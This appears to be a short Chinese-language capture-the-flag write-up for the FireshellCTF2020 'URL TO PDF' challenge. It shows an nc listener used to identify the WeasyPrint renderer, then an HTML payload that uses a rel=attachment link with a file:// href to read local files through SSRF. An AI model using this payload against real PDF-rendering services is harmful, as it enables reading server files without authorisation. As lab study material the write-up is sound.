[FireshellCTF2020]URL TO PDF

由于刚刚有些无聊所以再开一道

开局一个输入框，url转pdf？没见过

弹出下载，但是没法打开，用010来看，可以看到html，猜测爬虫之类的，可以开个服务器看看请求

root@VM-8-15-debian:~# nc -lvp 10004
listening on [any] 10004 ...
117.21.200.166: inverse host lookup failed: Unknown host
connect to [10.0.8.15] from (UNKNOWN) [117.21.200.166] 1519
GET / HTTP/1.1
Host: 82.157.174.226:10004
User-Agent: WeasyPrint 51 (http://weasyprint.org/)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

WeasyPrint是啥？没见过

WeasyPrint 是一个 Python 的虚拟 HTML 和 CSS 渲染引擎，可以用来将网页转成 PDF 文档。旨在支持 Web 标准的打印。

WeasyPrint 会把所有它支持的东西 都请求一遍然后放在 PDF 里，这里出现了漏洞，在 <link> 标签内 href 加载 file:// 实现 SSRF + 任意文件读取

Weasyprint (the library used here) allows including files into the PDF using <link rel=attachment href="PATH" /> in the HTML source for the PDF

• It’s a documented feature

• The information about weasyprint was leaked using a background-image CSS property to load an attacker-controlled image

• The vendor and version (weasyprint 44) were in the HTTP headers

开了个docker，写个html

<!DOCTYPE html>
<html>
<head>
<title>Captain</title>
</head>
<body>
<a rel='attachment' href='file:///flag'>
</body>